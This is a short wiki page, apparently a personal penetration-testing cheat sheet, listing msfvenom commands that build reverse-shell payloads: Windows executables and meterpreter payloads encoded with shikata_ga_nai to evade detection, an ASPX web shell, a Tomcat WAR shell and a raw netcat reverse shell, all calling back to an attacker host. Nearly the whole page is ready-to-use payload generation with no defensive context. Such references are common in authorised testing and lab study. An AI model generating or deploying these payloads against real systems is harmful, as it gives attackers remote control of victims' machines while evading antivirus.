Skip to content

MSFVenom

Alvin Smith edited this page Sep 18, 2021 · 19 revisions

Cheat Sheet

https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

Take it easy

https://www.revshells.com/

Samples

  • msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o ASCService.exe
  • msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
  • msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

aspx

msfvenom -p windows/x64/shell_reverse_tcp LHOST="ip" LPORT=4242 -f aspx > shell.aspx

Tomcat WAR

msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war

Output as Raw

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

List payloads

msfvenom --list payloads
msfvenom -l | grep windows
msfvenom --list | grep powershell

Shikata Ga Nai, encoder for x86

https://security.stackexchange.com/questions/130256/what-is-shikata-ga-nai

Clone this wiki locally